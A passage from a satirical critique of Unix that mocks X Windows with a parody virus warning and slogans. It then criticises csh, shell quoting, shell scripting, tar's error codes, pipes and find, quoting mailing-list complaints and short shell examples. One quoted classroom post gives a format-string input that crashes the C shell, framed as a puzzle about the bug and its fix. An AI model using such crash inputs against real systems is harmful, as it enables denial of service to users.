Nobody really wants to run X: what they do want is a way to run several applications at the same time using a large screen. If you want to run Unix, it's either X or a dumb character-based terminal. Pick your poison.
Official Notice, Post Immediately

Dangerous Virus!

First, a little history: The X window system escaped from Project Athena at MIT where it was being held in isolation. When notified, MIT stated publicly that "MIT assumes no responsibility…" This was a very disturbing statement. It then infiltrated Digital Equipment Corporation, where it has since corrupted the technical judgment of this organization.

After sabotaging Digital Equipment Corporation, a sinister X Consortium was created to find a way to use X as part of a plan to dominate and control interactive window systems across the planet. X windows is sometimes distributed by this secret consortium free of charge to unsuspecting victims. The destructive cost of X cannot even be guessed.

X is truly obese: whether it's mutilating your hard disk or actively infesting your system, you can be sure it's up to no good. It victimizes innocent users by distorting their perception of what is and what is not good software. This is what happens when software with good intentions goes bad. Innocent users need to be protected from this dangerous virus. Even as you read this, the X source distribution and the executable environment are being maintained on hundreds of computers, maybe even your own. No hardware is safe. Digital Equipment Corporation is already shipping machines that carry this dreaded infestation. It must be destroyed.

This malignant window system must be destroyed. Ultimately, DEC and MIT must be held accountable for this heinous software crime, brought to justice, and made to pay for a software cleanup. Until DEC and MIT answer to these charges, they both should be assumed to be protecting dangerous software criminals. Don't be fooled! Just say no to X.

A mistake carried out to perfection. X windows.
Dissatisfaction guaranteed. X windows.
Don't get frustrated without it. X windows.
Even your dog won't like it. X windows.
Flaky and built to stay that way. X windows.
Complex nonsolutions to simple nonproblems. X windows.
Flawed beyond belief. X windows.
Form follows malfunction. X windows.
Garbage at your fingertips. X windows.
Ignorance is our most important resource. X windows.
It could be worse, but it'll take time. X windows.
It could happen to you. X windows.
Japan's secret weapon. X windows.
Let it get in your way. X windows.
Live the nightmare. X windows.
More than enough rope. X windows.
Never had it, never will. X windows.
The art of incompetence. X windows.
Power tools for power fools. X windows.
Power tools for power losers. X windows.
Putting new limits on productivity. X windows.
Simplicity made complex. X windows.
The cutting edge of obsolescence. X windows.
The defacto substandard. X windows.
The first fully modular software disaster. X windows.
The joke that kills. X windows.
The problem for your problem. X windows.
There's got to be a better way. X windows.
Warn your friends about it. X windows.
You'd better sit down. X windows.
You'll envy the dead. X windows.

FIGURE 2. Distributed at the X-Windows Conference
Part 2: Programmer's System?
8
csh, pipes, and find

Power Tools for Power Fools

I have a natural revulsion to any operating system that shows so little planning as to have named all of its commands after digestive noises (awk, grep, fsck, nroff).
—Unknown

The Unix "power tool" metaphor is a canard. It's nothing more than a slogan behind which Unix hides its arcane patchwork of commands and ad hoc utilities. A real power tool amplifies the power of its user with little additional effort or instruction. Anyone capable of using a screwdriver or drill can use a power screwdriver or power drill. The user needs no understanding of electricity, motors, torquing, magnetism, heat dissipation, or maintenance. She just needs to plug it in, wear safety glasses, and pull the trigger. Most people even dispense with the safety glasses. It's rare to find a power tool that is fatally flawed in the hardware store: most badly designed power tools either don't make it to market or result in costly lawsuits, removing them from the market and punishing their makers.

Unix power tools don't fit this mold. Unlike the modest goals of its designers to have tools that were simple and single-purposed, today's Unix tools are over-featured, over-designed, and over-engineered. For example, ls, a program that once only listed files, now has more than 18 different options that control everything from sort order to the number of columns in which the printout appears: all functions that are better handled with other tools (and once were). The find command writes cpio-formatted output files in addition to finding files (something easily done by connecting the two commands with an infamous Unix pipe). Unlike the tools in the hardware store, most Unix power tools are flawed (sometimes fatally for files): there is, for example, tar, with its arbitrary 100-characters-in-a-pathname limit, or the Unix debuggers, which overwrite your "core" files with their own "core" files when they crash.

Unix's "power tools" are more like power switchblades that slice off the operator's fingers quickly and efficiently. Today, the Unix equivalent of a power drill would have 20 dials and switches, come with a nonstandard plug, require the user to hand-wind the motor coil, and not accept 3/8" or 7/8" drill bits (though this would be documented in the BUGS section of its instruction manual).

The Shell Game

The inventors of Unix had a great idea: make the command processor be just another user-level program. If users didn't like the default command processor, they could write their own. More importantly, shells could evolve, presumably so that they could become more powerful, flexible, and easy to use.

It was a great idea, but it backfired. The slow accretion of features caused a jumble. Because they weren't designed, but evolved, the shells fell victim to the curse of all programming languages: an installed base of programs. Bad ideas and features don't die out: as soon as a feature was added to a shell, someone wrote a shell script that depended on that feature, thereby ensuring its survival. The result is today's plethora of incomplete, incompatible shells (descriptions of each shell are from their respective man pages):

    sh    A command programming language that executes commands read
          from a terminal or a file.
    jsh   Identical [to sh], but with csh-style job control enabled.
    csh   A shell with C-like syntax.
    tcsh  Csh with emacs-style editing.
    ksh   KornShell, another command and programming language.
    zsh   The Z Shell.
    bash  The GNU Bourne-Again SHell.

Hardware stores contain screwdrivers or saws made by three or four different companies that all operate similarly. A typical Unix /bin or /usr/bin directory contains a hundred different kinds of programs, written by dozens of egotistical programmers, each with its own syntax, operating paradigm, rules of use (this one works as a filter, this one works on temporary files, etc.), different strategies for specifying options, and different sets of constraints.

Consider the program grep, with its cousins fgrep and egrep. Which one is fastest?[1] Why do these three programs take different options and implement slightly different semantics for the phrase "regular expressions"? Why isn't there just one program that combines the functionality of all three? Who is in charge here? After mastering the dissimilarities between the different commands, you'll still frequently find yourself startled and surprised. A few examples might be in order.

Shell crash

The following message was posted to an electronic bulletin board of a compiler class at Columbia University.[2]

Subject: Relevant Unix bug
October 11, 1991

Fellow W4115x students—

While we're on the subject of activation records, argument passing, and calling conventions, did you know that typing:

!xxx%s%s%s%s%s%s%s%s

[1] Ironically, egrep can be up to 50% faster than fgrep, even though fgrep only uses fixed-length strings that allegedly make the search "fast and compact." Go figure.
[2] Forwarded to Gumby by John Hinsdale, who sent it onward to UNIX-HATERS.
to any C-shell will cause it to crash immediately? Do you know why?

Questions to think about:

• What does the shell do when you type "!xxx"?
• What must it be doing with your input when you type "!xxx%s%s%s%s%s%s%s%s"?
• Why does this crash the shell?
• How could you (rather easily) rewrite the offending part of the shell so as not to have this problem?

MOST IMPORTANTLY:

• Does it seem reasonable that you (yes, you!) can bring what may be the Future Operating System of the World to its knees in 21 keystrokes?

Try it. By Unix's design, crashing your shell kills all your processes and logs you out. Other operating systems will catch an invalid memory reference and pop you into a debugger. Not Unix.

Perhaps this is why Unix shells don't let you extend them by loading new object code into their memory images, or by making calls to object code in other programs. It would be just too dangerous. Make one false move and—bam—you're logged out. Zero tolerance for programmer error.

The Metasyntactic Zoo

The C Shell's metasyntactic operator zoo results in numerous quoting problems and general confusion. Metasyntactic operators transform a command before it is issued. We call the operators metasyntactic because they are not part of the syntax of a command, but operators on the command itself. Metasyntactic operators (sometimes called escape operators) are familiar to most programmers. For example, the backslash character (\) within strings in C is metasyntactic; it doesn't represent itself, but some operation on the following characters. When you want a metasyntactic operator to stand for itself, you have to use a quoting mechanism that tells the system to interpret the operator as simple text. For example, returning to our C string example, to get the backslash character in a string, it is necessary to write \\.
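The same quoting dance happens one level up, in the shell itself. Here is a minimal Bourne-shell sketch (not from the original text) showing three ways to make the backslash stand for itself; printf is used rather than echo because many echo implementations interpret backslashes on their own:

```shell
#!/bin/sh
# Each command passes a single literal backslash to printf,
# which prints it followed by a newline.

printf '%s\n' \\     # unquoted: the shell consumes one backslash
printf '%s\n' '\'    # single quotes: the character stands for itself
printf '%s\n' "\\"   # double quotes: backslash still escapes backslash
```

All three lines print the same single \ character.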
Simple quoting barely works in the C Shell because no contract exists between the shell and the programs it invokes on the users' behalf. For example, consider the simple command:

grep string filename

The string argument contains characters that are defined by grep, such as ?, [, and ], that are metasyntactic to the shell. Which means that you might have to quote them. Then again, you might not, depending on the shell you use and how your environment variables are set. Searching for strings that contain periods or any pattern that begins with a dash complicates matters. Be sure to quote your meta character properly. Unfortunately, as with pattern matching, numerous incompatible quoting conventions are in use throughout the operating system.

As a result of this "design," the question mark character is forever doomed to perform single-character matching: it can never be used for help on the command line because it is never passed to the user's program, since Unix requires that this metasyntactic operator be interpreted by the shell.

The C Shell's metasyntactic zoo houses seven different families of metasyntactic operators. Because the zoo was populated over a period of time, and the cages are made of tin instead of steel, the inhabitants tend to stomp over each other. The seven different transformations on a shell command line are:

    Aliasing                      alias and unalias
    Command Output Substitution   `
    Filename Substitution         *, ?, []
    History Substitution          !, ^
    Variable Substitution         $, set, and unset
    Process Substitution          %
    Quoting                       ', "

Having seven different classes of metasyntactic characters wouldn't be so bad if they followed a logical order of operations and if their substitution rules were uniformly applied. But they don't, and they're not.
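A small sh session (the filenames and pattern here are invented for illustration) shows the kind of surprise this causes: whether grep ever sees your ? depends on what happens to be sitting in the current directory.

```shell
#!/bin/sh
# Work in a scratch directory so the demonstration is self-contained.
cd "$(mktemp -d)" || exit 1

printf 'mail.c\nmailx\n' > files.txt
: > mailx    # an innocent file whose name happens to match the glob mail?

# Unquoted: the shell's filename substitution rewrites mail? to mailx
# before grep ever runs, so grep searches for the literal string "mailx".
grep -c mail? files.txt      # prints 1

# Quoted: grep receives the pattern itself, where "." is grep's own
# any-single-character operator.
grep -c 'mail.' files.txt    # prints 2
```

And in csh the unquoted version behaves differently again: when no filename matches, csh aborts the command with "No match" instead of passing the pattern through, which is exactly the shell-to-shell variation described above.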
Date: Mon, 7 May 90 18:00:27 -0700
From: Andy Beals <bandy@lll-crg.llnl.gov>
Subject: Re: today's gripe: fg %3
To: UNIX-HATERS

Not only can you say %emacs or even %e to restart a job [if it's a unique completion], one can also say %?foo if the substring "foo" appeared in the command line. Of course, !ema and !?foo also work for history substitution. However, the pinheads at UCB didn't make !?foo recognize subsequent editing commands, so the brain-damaged c-shell won't recognize things like !?foo:s/foo/bar&/:p, making typing a pain. Was it really so hard to scan forward for that one editing character?

All of this gets a little confusing, even for Unix "experts." Take the case of Milt Epstein, who wanted a way of writing a shell script to determine the exact command line being typed, without any preprocessing by the shell. He found out that this wasn't easy because the shell does so much on the program's "behalf." To avoid shell processing required an amazingly arcane incantation that not even most experts can understand. This is typical of Unix, making apparently simple things incredibly difficult to do, simply because they weren't thought of when Unix was first built:

Date: 19 Aug 91 15:26:00 GMT
From: Dan_Jacobson@att.com
Subject: ${1+"$@"} in /bin/sh family of shells shell scripts
Newsgroups: comp.emacs,gnu.emacs.help,comp.unix.shell

>>>>> On Sun, 18 Aug 91 18:21:58 -0500,
>>>>> Milt Epstein <epstein@suna0.cs.uiuc.edu> said:

Milt> what does the "${1+"$@"}" mean? I'm sure it's to
Milt> read in the rest of the command line arguments, but
Milt> I'm not sure exactly what it means.
It says, "If there is at least one argument ( ${1+ ), then substitute in all the arguments ( "$@" ) preserving all the spaces, etc., within each argument." If we used only "$@" then that would substitute to "" (a null argument) if there were no invocation arguments, but we want no arguments reproduced in that case, not "".

Why not "$*" etc.? From a sh(1) man page:

    Inside a pair of double quote marks (""), parameter and command
    substitution occurs and the shell quotes the results to avoid blank
    interpretation and file name generation.  If $* is within a pair of
    double quotes, the positional parameters are substituted and quoted,
    separated by quoted spaces ("$1 $2 ..."); however, if $@ is within a
    pair of double quotes, the positional parameters are substituted and
    quoted, separated by unquoted spaces ("$1" "$2" ...).

I think ${1+"$@"} is portable all the way back to "Version 7 Unix."

Wow! All the way back to Version 7.

The Shell Command "chdir" Doesn't

Bugs and apparent quirky behavior are the result of Unix's long evolution by numerous authors, all trying to take the operating system in a different direction, none of them stopping to consider their effects upon one another.

Date: Mon, 7 May 90 22:58:58 EDT
From: Alan Bawden <alan@ai.mit.edu>
Subject: cd . . : I am not making this up
To: UNIX-HATERS

What could be more straightforward than the "cd" command? Let's consider a simple case: "cd ftp." If my current directory, /home/ar/alan, has a subdirectory named "ftp," then that becomes my new current directory. So now I'm in /home/ar/alan/ftp. Easy.

Now, you all know about "." and ".."? Every directory always has two entries in it: one named "." that refers to the directory itself, and one named ".." that refers to the parent of the directory. So in our example, I can return to /home/ar/alan by typing "cd ..".
Now suppose that "ftp" was a symbolic link (bear with me just a while longer). Suppose that it points to the directory /com/ftp/pub/alan. Then after "cd ftp" I'm sitting in /com/ftp/pub/alan. Like all directories, /com/ftp/pub/alan contains an entry named ".." that refers to its superior: /com/ftp/pub. Suppose I want to go there next. I type:

    % cd ..

Guess what? I'm back in /home/ar/alan! Somewhere in the shell (apparently we all use something called "tcsh" here at the AI Lab) somebody remembers that a link was chased to get me into /com/ftp/pub/alan, and the cd command guesses that I would rather go back to the directory that contained the link. If I really wanted to visit /com/ftp/pub, I should have typed "cd ./..".

Shell Programming

Shell programmers and the dinosaur cloners of Jurassic Park have much in common. They don't have all the pieces they need, so they fill in the missing pieces with random genomic material. Despite tremendous self-confidence and ability, they can't always control their creations.

Shell programs, goes the theory, have a big advantage over programs written in languages like C: shell programs are portable. That is, a program written in the shell "programming language" can run on many different flavors of Unix running on top of many different computer architectures, because the shell interprets its programs, rather than compiling them into machine code. What's more, sh, the standard Unix shell, has been a central part of Unix since 1977 and, thus, we are likely to find it on any machine.

Let's put the theory to the test by writing a shell script to print the name and type of every file in the current directory using the file program:

Date: Fri, 24 Apr 92 14:45:48 EDT
From: Stephen Gildea <gildea@expo.lcs.mit.edu>
Subject: Simple Shell Programming
To: UNIX-HATERS
Hello, class. Today we are going to learn to program in "sh." The "sh" shell is a simple, versatile program, but we'll start with a basic example: print the types of all the files in a directory.

(I heard that remark in the back! Those of you who are a little familiar with the shell and bored with this can write "start an X11 client on a remote machine" for extra credit. In the mean time, shh!)

While we're learning to sh, of course we also want the program we are writing to be robust, portable, and elegant. I assume you've all read the appropriate manual pages, so the following should be trivially obvious:

    file *

Very nice, isn't it? A simple solution for a simple problem.

Well, not quite. Files beginning with a dot are assumed to be uninteresting, and * won't match them. There probably aren't any, but since we do want to be robust, we'll use "ls" and pass a special flag:

    for file in `ls -A`
    do
        file $file
    done

There: elegant, robust… Oh dear, the "ls" on some systems doesn't take a "-A" flag. No problem, we'll pass -a instead and then weed out the . and .. files:

    for file in `ls -a`
    do
        if [ $file != . -a $file != .. ]
        then
            file $file
        fi
    done

Not quite as elegant, but at least it's robust and portable. What's that? "ls -a" doesn't work everywhere either? No problem, we'll use "ls -f" instead. It's faster, anyway. I hope all this is obvious from reading the manual pages.
Hmm, perhaps not so robust after all. Unix file names can have any character in them (except slash). A space in a filename will break this script, since the shell will parse it as two file names. Well, that's not too hard to deal with. We'll just change the IFS to not include Space (or Tab while we're at it), and carefully quote (not too little, not too much!) our variables, like this:

    IFS='
    '
    for file in `ls -f`
    do
        if [ "$file" != . -a "$file" != .. ]
        then
            file "$file"
        fi
    done

Some of you alert people will have already noticed that we have made the problem smaller, but we haven't eliminated it, because Linefeed is also a legal character in a filename, and it is still in IFS.

Our script has lost some of its simplicity, so it is time to reevaluate our approach. If we removed the "ls" then we wouldn't have to worry about parsing its output. What about

    for file in .* *
    do
        if [ "$file" != . -a "$file" != .. ]
        then
            file "$file"
        fi
    done

Looks good. Handles dot files and files with nonprinting characters. We keep adding more strangely named files to our test directory, and this script continues to work. But then someone tries it on an empty directory, and the * pattern produces "No such file." But we can add a check for that…

…at this point my message is probably getting too long for some of your uucp mailers, so I'm afraid I'll have to close here and leave fixing the remaining bugs as an exercise for the reader.

Stephen
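For what it's worth, the exercise does have an ending, though it needs tools that postdate the message: POSIX find can enumerate the directory entries itself and hand them to file without the shell ever re-parsing a name. A sketch (ours, not Gildea's):

```shell
#!/bin/sh
# Type every entry in the current directory, dot files included.
# find passes the names straight to file as argument vectors, so
# spaces, newlines, and leading dashes in filenames cannot break it.
# The "! -name . -prune" idiom keeps find from descending into
# subdirectories (-maxdepth is a GNU extension, so we avoid it).
find . ! -name . -prune -exec file {} +
```

The `-exec … {} +` batching form is a later POSIX addition; on a truly ancient find you would be back to `\;` and one process per file.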
There is another big problem as well, one that we've been glossing over from the beginning: the Unix file program doesn't work.

Date: Sat, 25 Apr 92 17:33:12 EDT
From: Alan Bawden <Alan@lcs.mit.edu>
Subject: Simple Shell Programming
To: UNIX-HATERS

WHOA! Hold on a second. Back up. You're actually proposing to use the 'file' program? Everybody who wants a good laugh should pause right now, find a Unix machine, and try typing "file *" in a directory full of miscellaneous files.

For example, I just ran 'file' over a directory full of C source code—here is a selection of the results:

    arith.c:     c program text
    binshow.c:   c program text
    bintxt.c:    c program text

So far, so good. But then:

    crc.c:       ascii text

See, 'file' isn't looking at the ".c" in the filename; it's applying some heuristics based on an examination of the contents of the file. Apparently crc.c didn't look enough like C code—although to me it couldn't possibly be anything else.

    gencrc.c.~4~: ascii text
    gencrc.c:     c program text

I guess I changed something after version 4 that made gencrc.c look more like C…

    tcfs.h.~1~:  c program text
    tcfs.h:      ascii text

while tcfs.h looked less like C after version 1.

    time.h:      English text

That's right, time.h apparently looks like English, rather than just ascii. I wonder if 'file' has recognition rules for Spanish or French?
(BTW, your typical TeX source file gets classified as "ascii text" rather than "English text," but I digress…)

    words.h.~1~: ascii text
    words.h:     English text

Perhaps I added some comments to words.h after version 1?

But I saved the best for last:

    arc.h:       shell commands
    Makefile:    [nt]roff, tbl, or eqn input text

Both wildly wrong. I wonder what would happen if I tried to use them as if they were the kinds of program that the 'file' program assigns them?

—Alan

Shell Variables Won't

Things could be worse for Alan. He could, for instance, be trying to use shell variables. As we've mentioned before, sh and csh implement shell variables slightly differently. This wouldn't be so bad, except that semantics of shell variables—when they get defined, the atomicity of change operations, and other behaviors—are largely undocumented and ill-defined. Frequently, shell variables behave in strange, counter-intuitive ways that can only be comprehended after extensive experimentation.

Date: Thu, 14 Nov 1991 11:46:21 PST
From: Stanley's Tool Works <lanning@parc.xerox.com>
Subject: You learn something new every day
To: UNIX-HATERS

Running this script:

    #!/bin/csh
    unset foo
    if ( ! $?foo ) then
        echo foo was unset
    else if ( "$foo" = "You lose" ) then
        echo $foo
    endif

produces this error:

    foo: Undefined variable.

To get the script to "do the right thing," you have to resort to a script that looks like this:

    #!/bin/csh
    unset foo
    if ( ! $?foo ) then
        echo foo was unset
        set foo
    else if ( "$foo" = "You lose" ) then
        echo $foo
    endif

[Notice the need to 'set foo' after we discovered that it was unset.] Clear, eh?
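The Bourne shell is no prize here either; it merely fails differently. Its ${...} modifiers can at least distinguish "unset" from "set but empty" without the script blowing up, which is the distinction the $?foo dance above is groping for. A small sh demonstration (ours, not from the message):

```shell
#!/bin/sh
# ${foo+word} expands to word only if foo is set (even to the empty
# string); ${foo:+word} additionally requires foo to be nonempty.
unset foo
echo "unset:  [${foo+set}]"        # prints "unset:  []"
foo=""
echo "empty:  [${foo+set}]"        # prints "empty:  [set]"
echo "empty:  [${foo:+nonempty}]"  # prints "empty:  []"
foo="You lose"
echo "full:   [${foo:+nonempty}]"  # prints "full:   [nonempty]"
```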
Error Codes and Error Checking
Our programming example glossed over how the file command reports an error back to the shell script. Well, it doesn't. Errors are ignored. This behavior is no oversight: most Unix shell scripts (and other programs as well) ignore error codes that might be generated by a program that they call. This behavior is acceptable because no standard convention exists to specify which codes should be returned by programs to indicate errors.

Perhaps error codes are universally ignored because they aren't displayed when a user is typing commands at a shell prompt. Error codes and error checking are so absent from the Unix Canon that many programs don't even bother to report them in the first place.

Date: Tue, 6 Oct 92 08:44:17 PDT
From: Bjorn Freeman-Benson <bnfb@ursamajor.uvic.ca>
Subject: It's always good news in Unix land
To: UNIX-HATERS
Consider this tar program. Like all Unix “tools” (and I use the word loosely) it works in strange and unique ways. For example, tar is a program with lots of positive energy and thus is convinced that nothing bad will ever happen and thus it never returns an error status. In
fact, even if it prints an error message to the screen, it still reports "good news," i.e., status 0. Try this in a shell script:

    tar cf temp.tar no.such.file
    if( $status == 0 ) echo "Good news! No error."

and you get this:

    tar: no.such.file: No such file or directory
    Good news! No error.

I know—I shouldn't have expected anything consistent, useful, documented, speedy, or even functional…

Bjorn
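Checking a status in sh looks like the sketch below. Whether tar cooperates depends on your tar; modern GNU tar, for one, does exit nonzero when a file is missing, which is exactly what Bjorn's didn't do:

```shell
#!/bin/sh
# An sh rendition of Bjorn's test.  The exit status of the last
# command is also available in $?; a command that can't even be
# found yields 127.
if tar cf temp.tar no.such.file 2>/dev/null
then
    echo "Good news! No error."
else
    echo "tar failed"   # what you'd hope for, and what GNU tar gives you
fi
rm -f temp.tar
```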
Pipes
My judgment of Unix is my own. About six years ago (when I first got my workstation), I spent lots of time learning Unix. I got to be fairly good. Fortunately, most of that garbage has now faded from memory. However, since joining this discussion, a lot of Unix supporters have sent me examples of stuff to “prove” how powerful Unix is. These examples have certainly been enough to refresh my memory: they all do something trivial or useless, and they all do so in a very arcane manner. One person who posted to the net said he had an “epiphany” from a shell script (which used four commands and a script that looked like line noise) which renamed all his '.pas' files so that they ended with “.p” instead. I reserve my religious ecstasy for something more than renaming files. And, indeed, that is my memory of Unix tools—you spend all your time learning to do complex and peculiar things that are, in the end, not really all that impressive. I decided I’d rather learn to get some real work done. —Jim Giles Los Alamos National Laboratory Unix lovers believe in the purity, virtue, and beauty of pipes. They extol pipes as the mechanism that, more than any other feature, makes Unix Unix. “Pipes,” Unix lovers intone over and over again, “allow complex
programs to be built out of simpler programs. Pipes allow programs to be used in unplanned and unanticipated ways. Pipes allow simple implementations." Unfortunately, chanting mantras doesn't do Unix any more good than it does the Hari Krishnas.

Pipes do have some virtue. The construction of complex systems requires modularity and abstraction. This truth is a catechism of computer science. The better tools one has for composing larger systems from smaller systems, the more likely a successful and maintainable outcome. Pipes are a structuring tool, and, as such, have value. Here is a sample pipeline:3

    egrep '^To:|^Cc:' /var/spool/mail/$USER | \
    cut -c5- | \
    awk '{ for (i = 1; i <= NF; i++) print $i }' | \
    sed 's/,//g' | grep -v $USER | sort | uniq

Clear, huh? This pipeline looks through the user's mailbox and determines which mailing lists they are on (well, almost). Like most pipelines, this one will fail in mysterious ways under certain circumstances.

Indeed, while pipes are useful at times, their system of communication between programs—text traveling through standard input and standard output—limits their usefulness.4 First, the information flow is only one way. Processes can't use shell pipelines to communicate bidirectionally. Second, pipes don't allow any form of abstraction. The receiving and sending processes must use a stream of bytes. Any object more complex than a byte cannot be sent until the object is first transmuted into a string of bytes that the receiving end knows how to reassemble. This means that you can't send an object and the code for the class definition necessary to implement the object. You can't send pointers into another process's address space. You can't send file handles or tcp connections or permissions to access particular files or resources.
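The "(well, almost)" is doing real work in that sentence. Feed the same pipeline a toy mailbox (invented addresses; a here-string stands in for /var/spool/mail) and it behaves—right up until a header is folded across two lines or an address happens to contain the user's name, at which point entries are silently dropped:

```shell
#!/bin/sh
# The book's pipeline, run for user "alice" over a two-header toy mailbox.
printf 'To: bob@example.com, alice@example.com\nCc: list@example.com\n' |
egrep '^To:|^Cc:' |
cut -c5- |
awk '{ for (i = 1; i <= NF; i++) print $i }' |
sed 's/,//g' |
grep -v alice |
sort | uniq
# prints:
# bob@example.com
# list@example.com
```

Note that `grep -v alice` would also discard a list named alice-lovers@example.com, and an RFC 822 continuation line starting with whitespace never makes it past the egrep.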
At the risk of sounding like a hopeless dream keeper of the intergalactic space, we submit that the correct model is procedure call (either local or remote) in a language that allows first-class structures (which C gained during its adolescence) and functional composition.
3. Thanks to Michael Grant at Sun Microsystems for this example.
4. We should note that this discussion of "pipes" is restricted to traditional Unix pipes, the kind that you can create with shell using the vertical bar (|). We're not talking about named pipes, which are a different beast entirely.
Pipes are good for simple hacks, like passing around simple text streams, but not for building robust software. For example, an early paper on pipes showed how a spelling checker could be implemented by piping together several simple programs. It was a tour de force of simplicity, but a horrible way to check the spelling (let alone correct it) of a document.

Pipes in shell scripts are optimized for micro-hacking. They give programmers the ability to kludge up simple solutions that are very fragile. That's because pipes create dependencies between the two programs: you can't change the output format of one without changing the input routines of the other.

Most programs evolve: first the program's specifications are envisioned, then the insides of the program are cobbled together, and finally somebody writes the program's output routines. Pipes arrest this process: as soon as somebody starts throwing a half-baked Unix utility into a pipeline, its output specification is frozen, no matter how ambiguous, nonstandard, or inefficient it might be.

Pipes are not the be-all and end-all of program communication. Our favorite Unix-loving book had this to say about the Macintosh, which doesn't have pipes:

    The Macintosh model, on the other hand, is the exact opposite. The
    system doesn't deal with character streams. Data files are extremely
    high level, usually assuming that they are specific to an
    application. When was the last time you piped the output of one
    program to another on a Mac? (Good luck even finding the pipe
    symbol.) Programs are monolithic, the better to completely
    understand what you are doing. You don't take MacFoo and MacBar and
    hook them together.

    —From Life with Unix, by Libes and Ressler

Yeah, those poor Mac users. They've got it so rough. Because they can't pipe streams of bytes around, how are they ever going to paste artwork from their drawing program into their latest memo and have text flow around it?
How are they going to transfer a spreadsheet into their memo? And how could such users expect changes to be tracked automatically? They certainly shouldn’t expect to be able to electronically mail this patchedtogether memo across the country and have it seamlessly read and edited at the other end, and then returned to them unscathed. We can’t imagine how they’ve been transparently using all these programs together for the last 10 years and having them all work, all without pipes.
When was the last time your Unix workstation was as useful as a Macintosh? When was the last time it ran programs from different companies (or even different divisions of the same company) that could really communicate? If it's done so at all, it's because some Mac software vendor sweated blood porting its programs to Unix, and tried to make Unix look more like the Mac.

The fundamental difference between Unix and the Macintosh operating system is that Unix was designed to please programmers, whereas the Mac was designed to please users. (Windows, on the other hand, was designed to please accountants, but that's another story.)

Research has shown that pipes and redirection are hard to use, not because of conceptual problems, but because of arbitrary and unintuitive limitations. It is documented that only those steeped in Unixdom, not run-of-the-mill users, can appreciate or use the power of pipes.

Date: Thu, 31 Jan 91 14:29:42 EST
From: Jim Davis <jrd@media-lab.media.mit.edu>
To: UNIX-HATERS
Subject: Expertise
This morning I read an article in the Journal of Human-Computer Interaction, “Expertise in a Computer Operating System,” by Stephanie M. Doane and two others. Guess which operating system she studied? Doane studied the knowledge and performance of Unix novices, intermediates, and expert users. Here are few quotes: “Only experts could successfully produce composite commands that required use of the distinctive features of Unix (e.g. pipes and other redirection symbols).” In other words, every feature that is new in Unix (as opposed to being copied, albeit in a defective or degenerate form from another operating system) is so arcane that it can be used only after years of arcane study and practice. “This finding is somewhat surprising, inasmuch as these are fundamental design features of Unix, and these features are taught in elementary classes.” She also refers to the work of one S. W. Draper, who is said to have believed, as Doane says:
"There are no Unix experts, in the naive sense of an exalted group whose knowledge is exhaustive and who need not learn more."

Here I must disagree. It is clear that an attempt to master the absurdities of Unix would exhaust anyone.

Some programs even go out of their way to make sure that pipes and file redirection behave differently from one another:

Date: Thu, 8 Oct 1992 11:37:14 PDT
From: Leigh L. Klotz <klotz@adoc.xerox.com>
To: UNIX-HATERS
Subject: | vs. <
    collard% xtpanel -file xtpanel.out < .login
    unmatched braces
    unmatched braces
    unmatched braces
    3 unmatched right braces present
    collard% cat .login | xtpanel -file xtpanel.out
    collard%

You figure it out.
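Whatever xtpanel was doing, the underlying trick is real: a program can stat its standard input and behave differently for a pipe than for a redirected file, even though neither is a terminal. A minimal demonstration (ours, not xtpanel's code; it leans on /dev/stdin, so it is Linux-flavored):

```shell
#!/bin/sh
# Classify standard input: -p tests for a FIFO/pipe, -t 0 for a tty,
# and anything else is treated as a plain file.
classify() {
    if [ -p /dev/stdin ]; then echo "stdin is a pipe"
    elif [ -t 0 ];        then echo "stdin is a terminal"
    else                       echo "stdin is a file"
    fi
}

echo hello | classify     # prints "stdin is a pipe"
classify < /etc/passwd    # prints "stdin is a file"
```

A program with two such code paths will, like xtpanel, happily do different things for `cmd < file` and `cat file | cmd`.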
Find
The most horrifying thing about Unix is that, no matter how many times you hit yourself over the head with it, you never quite manage to lose consciousness. It just goes on and on. —Patrick Sobalvarro Losing a file in a large hierarchical filesystem is a common occurrence. (Think of Imelda Marcos trying to find her pink shoes with the red toe ribbon among all her closets.) This problem is now hitting PC and Apple users with the advent of large, cheap disks. To solve this problem computer systems provide programs for finding files that match given criteria, that have a particular name, or type, or were created after a particular date. The Apple Macintosh and Microsoft Windows have powerful file locators that are relatively easy to use and extremely reliable. These file finders were
designed with a human user and modern networking in mind. The Unix file finder program, find, wasn't designed to work with humans, but with cpio—a Unix backup utility program. Find couldn't anticipate networks or enhancements to the file system such as symbolic links; even after extensive modifications, it still doesn't work well with either. As a result, despite its importance to humans who've misplaced their files, find doesn't work reliably or predictably.

The authors of Unix tried to keep find up to date with the rest of Unix, but it is a hard task. Today's find has special flags for NFS file systems, symbolic links, executing programs, conditionally executing programs if the user types "y," and even directly archiving the found files in cpio or cpio-c format. Sun Microsystems modified find so that a background daemon builds a database of every file in the entire Unix file system which, for some strange reason, the find command will search if you type "find filename" without any other arguments. (Talk about a security violation!) Despite all of these hacks, find still doesn't work properly.

For example, the csh follows symbolic links, but find doesn't: csh was written at Berkeley (where symbolic links were implemented), but find dates back to the days of AT&T, pre-symlink. At times, the culture clash between East and West produces mass confusion.

Date: Thu, 28 Jun 1990 18:14 EDT
From: pgs@crl.dec.com
Subject: more things to hate about Unix
To: UNIX-HATERS
This is one of my favorites. I'm in some directory, and I want to search another directory for files, using find. I do:

    po> pwd
    /ath/u1/pgs
    po> find ~halstead -name "*.trace" -print
    po>

The files aren't there. But now:

    po> cd ~halstead
    po> find . -name "*.trace" -print
    ./learnX/fib-3.trace
    ./learnX/p20xp20.trace
    ./learnX/fib-3i.trace
    ./learnX/fib-5.trace
    ./learnX/p10xp10.trace
    po>

Hey, now the files are there! Just have to remember to cd to random directories in order to get find to find things in them. What a crock of Unix.

Poor Halstead must have the entry for his home directory in /etc/passwd pointing off to some symlink that points to his real directory, so some commands work for him and some don't.

Why not modify find to make it follow symlinks? Because then any symlink that pointed to a directory higher up the tree would throw find into an endless loop. It would take careful forethought and real programming to design a system that didn't scan endlessly over the same directory time after time. The simple, copout solution is just not to follow symlinks, and force the users to deal with the result.

As networked systems become more and more complicated, these problems are becoming harder and harder:

Date: Wed, 2 Jan 1991 16:14:27 PST
From: Ken Harrenstien <klh@nisc.sri.com>
Subject: Why find doesn't find anything
To: UNIX-HATERS

